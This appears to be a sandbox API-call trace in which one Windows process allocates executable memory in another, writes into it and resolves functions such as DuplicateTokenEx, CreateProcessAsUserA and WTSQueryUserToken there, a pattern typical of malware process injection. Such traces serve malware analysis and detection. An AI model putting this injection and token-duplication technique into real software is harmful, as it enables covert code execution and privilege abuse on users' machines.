	[0188.050] ResetEvent (hEvent=0x478) returned 1
	[0188.050] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.050] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.050] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.050] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.050] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.050] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055060, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.051] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.051] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.051] lstrlenA (lpString="RegDisablePredefinedCacheEx") returned 27
	[0188.051] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.051] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7814*, nSize=0x1c, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7814*, lpNumberOfBytesWritten=0x12857c*=0x1c) returned 1
	[0188.051] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.051] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.051] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.051] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.052] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.052] ResetEvent (hEvent=0x478) returned 1
	[0188.052] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.053] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.053] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.053] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.053] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.053] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055064, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.053] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.053] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.053] lstrlenA (lpString="RegCreateKeyA") returned 13
	[0188.053] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.054] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7832*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7832*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0188.054] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.054] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.054] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.054] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.055] ResetEvent (hEvent=0x478) returned 1
	[0188.055] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.055] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.055] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.055] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.055] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.055] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055068, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.056] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.056] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.056] lstrlenA (lpString="DuplicateTokenEx") returned 16
	[0188.056] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.056] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7842*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7842*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0188.056] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.057] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.057] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.057] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.057] ResetEvent (hEvent=0x478) returned 1
	[0188.057] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.058] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.058] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.058] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.058] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.058] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005506c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.058] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.058] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.059] lstrlenA (lpString="CreateProcessAsUserA") returned 20
	[0188.059] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.059] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7856*, nSize=0x15, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7856*, lpNumberOfBytesWritten=0x12857c*=0x15) returned 1
	[0188.059] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.059] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.059] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.059] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.060] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.060] ResetEvent (hEvent=0x478) returned 1
	[0188.060] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.060] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.060] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.060] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.060] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.061] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055070, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.061] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.061] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.061] lstrlenA (lpString="CryptHashData") returned 13
	[0188.061] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.061] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6e08*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6e08*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0188.062] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.062] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.062] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.062] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.062] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.063] ResetEvent (hEvent=0x478) returned 1
	[0188.063] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.063] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.063] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.063] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.063] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.063] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055074, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.064] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.064] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0188.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb6e98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0188.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb6e98, cbMultiByte=-1, lpWideCharStr=0x23078c0, cchWideChar=13 | out: lpWideCharStr="WTSAPI32.dll") returned 13
	[0188.064] lstrlenW (lpString="WTSAPI32.dll") returned 12
	[0188.064] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.064] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x23078c0*, nSize=0x1a, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23078c0*, lpNumberOfBytesWritten=0x12857c*=0x1a) returned 1
	[0188.064] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0188.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.064] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.065] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0188.065] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0188.065] ResetEvent (hEvent=0x478) returned 1
	[0188.065] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.067] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0188.067] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.067] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.067] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.067] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.067] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.067] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.067] lstrlenA (lpString="WTSQueryUserToken") returned 17
	[0188.067] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.068] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6e86*, nSize=0x12, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6e86*, lpNumberOfBytesWritten=0x12857c*=0x12) returned 1
	[0188.068] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.068] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.068] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.068] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.069] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.069] ResetEvent (hEvent=0x478) returned 1
	[0188.069] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.069] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.069] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.069] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.069] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.070] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005531c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.070] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.070] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0188.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb6ec0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0188.070] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb6ec0, cbMultiByte=-1, lpWideCharStr=0x23078c0, cchWideChar=12 | out: lpWideCharStr="USERENV.dll") returned 12
	[0188.070] lstrlenW (lpString="USERENV.dll") returned 11
	[0188.070] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.070] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x23078c0*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23078c0*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0188.071] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0188.071] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.071] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.071] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0188.071] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0188.072] ResetEvent (hEvent=0x478) returned 1
	[0188.072] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.082] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0188.082] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.082] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.083] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.083] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.083] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.083] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.083] lstrlenA (lpString="CreateEnvironmentBlock") returned 22
	[0188.083] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.083] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6ea8*, nSize=0x17, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6ea8*, lpNumberOfBytesWritten=0x12857c*=0x17) returned 1
	[0188.084] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.084] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.084] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.084] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.084] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.085] ResetEvent (hEvent=0x478) returned 1
	[0188.085] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.085] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.085] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.085] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.085] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.085] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552d4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.086] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.086] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0188.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb6ecc, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0188.086] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb6ecc, cbMultiByte=-1, lpWideCharStr=0x23078c0, cchWideChar=11 | out: lpWideCharStr="WS2_32.dll") returned 11
	[0188.086] lstrlenW (lpString="WS2_32.dll") returned 10
	[0188.086] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.086] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x23078c0*, nSize=0x16, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23078c0*, lpNumberOfBytesWritten=0x12857c*=0x16) returned 1
	[0188.086] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0188.086] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.086] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.087] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0188.087] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0188.087] ResetEvent (hEvent=0x478) returned 1
